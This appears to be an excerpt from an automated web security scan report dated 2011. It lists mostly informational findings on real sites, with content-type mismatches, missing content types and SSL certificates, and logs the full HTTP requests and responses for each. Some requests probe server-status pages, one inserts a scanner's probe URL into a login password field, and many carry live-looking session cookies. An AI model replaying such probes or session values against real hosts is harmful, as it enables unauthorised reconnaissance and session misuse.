ETag: "6890-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26768
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR...r...n.......c.....PLTE.................q.........m.........................._.................................11.......................................(q............................
...[SNIP]...

33.79. http://www.manageengine.com/images/network-configuration-management.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/network-configuration-management.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-configuration-management.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "612b-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 24875
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......<.....@G......PLTE.....Q........Ap.6...s.............................Al.......................l...............................................................i..............7...
...[SNIP]...

33.80. http://www.manageengine.com/images/network-health-monitoring.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/network-health-monitoring.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-health-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8aa9-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 35497
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...D......... .l....PLTE................--..............................3q.dea.....................q..x........m........Q.Q....m.gi....G.H.....................Jt......l..Rh.m......;..
...[SNIP]...

33.81. http://www.manageengine.com/images/network-mapping.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/network-mapping.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-mapping.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "6a13-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 27155
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.............a.[.....PLTEk.h..................NNO...........d...^.]......`...............}.|||...jq..l.......rt....kkk..........Y.........&"....M...aaa......sss....................V.iH
...[SNIP]...

33.82. http://www.manageengine.com/images/traffic-analysis.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/traffic-analysis.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/traffic-analysis.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "68df-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26847
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...?.........h`.{....PLTE..................u....Y.......pX...Ej.........................kk.#U..................K.....................}}|..............f...X....m........................
...[SNIP]...

33.83. http://www.manageengine.com/images/wan-monitoring.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/wan-monitoring.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/wan-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8252-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 33362
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......=.....w8K@....PLTEp.............cg..\l...............k......f..........................Z...........q.q..a..........................................r.'......mrr7pI......F.R......
...[SNIP]...

33.84. http://www.netsuite.com/portal/javascript/effects.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netsuite.com
Path:	/portal/javascript/effects.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/effects.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename*=utf-8''effects.js
NS_RTIMER_COMPOSITE: 1564836203:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2976
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 38227

// script.aculo.us effects.js v1.7.1_beta2, Sat Apr 28 15:20:12 CEST 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (htt
...[SNIP]...

33.85. http://www.netsuite.com/portal/javascript/prototype.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netsuite.com
Path:	/portal/javascript/prototype.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/prototype.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="prototype.js"
NS_RTIMER_COMPOSITE: -102598731:73686F702D6A6176613031342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2627
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 99594

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...

33.86. http://www.smpone.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smpone.com
Path:	/javascript/common.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...

33.87. http://www.smpone.com/javascript/image_pop.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smpone.com
Path:	/javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

33.88. http://www.smpone.com/javascript/showimages.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smpone.com
Path:	/javascript/showimages.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

33.89. http://www.tresware.com/javascript/bbcode.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/javascript/bbcode.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...

33.90. http://www.tresware.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/javascript/common.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...

33.91. http://www.tresware.com/javascript/edittags.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/javascript/edittags.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {

...[SNIP]...

33.92. http://www.tresware.com/javascript/image_pop.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

33.93. http://www.tresware.com/javascript/showimages.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/javascript/showimages.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

33.94. http://www.trucklist.ru/webroot/delivery/js/scripts.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/scripts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /webroot/delivery/js/scripts.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:41:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 59289
Last-Modified: Tue, 01 Mar 2011 08:25:06 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:41:04 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

...window.reEmail = /^([\w\.\-])+@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/i;

var w3cDOM = (typeof document.getElementById != "undefined" && typeof document.createElement != "undefined") ? true : fa
...[SNIP]...

34. Content type is not specified previous next
There are 5 instances of this issue:

https://checkout.netsuite.com/server-info
https://checkout.netsuite.com/server-status
https://hourly.deploy.com/hmc/report/index.cfm
http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard
http://partner-support.wiki.zoho.com/favicon.ico

34.1. https://checkout.netsuite.com/server-info previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/server-info

Request

GET /server-info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>

34.2. https://checkout.netsuite.com/server-status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/server-status

Request

GET /server-status HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744322|PC#1303736347554-914602.17#1366814462|check#true#1303742522

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>

34.3. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 51

j_password=http://netsparker.com/n&j_username=Smith

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css">
...[SNIP]...

34.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kronos.tt.omtrdc.net
Path:	/m2/kronos/mbox/standard

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();

34.5. http://partner-support.wiki.zoho.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partner-support.wiki.zoho.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zwcsrfcki=dcebcee0-6d9d-446f-8e91-6618ac1b7fdd; JSESSIONID=D42EBA6A1D444AECC44D46E1F5687ABF

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
ETag: W/"1150-1301472610000"
Last-Modified: Wed, 30 Mar 2011 08:10:10 GMT
Content-Length: 1150
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache-Coyote/1.1

............ .h.......(....... ..... ...........................C...C...B...C...C...C...C...B...C...C...B...C...C...C...C...C...G...G...F...F...G...F...F...F...G...G...G...F...F...F...F...F...J...J...
...[SNIP]...

35. SSL certificate previous
There are 5 instances of this issue:

https://checkout.netsuite.com/
https://forms.netsuite.com/
https://store.manageengine.com/
https://system.netsuite.com/
https://www.manageengine.com/

35.1. https://checkout.netsuite.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	checkout.netsuite.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Jul 08 19:00:00 CDT 2009
Valid to:	Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

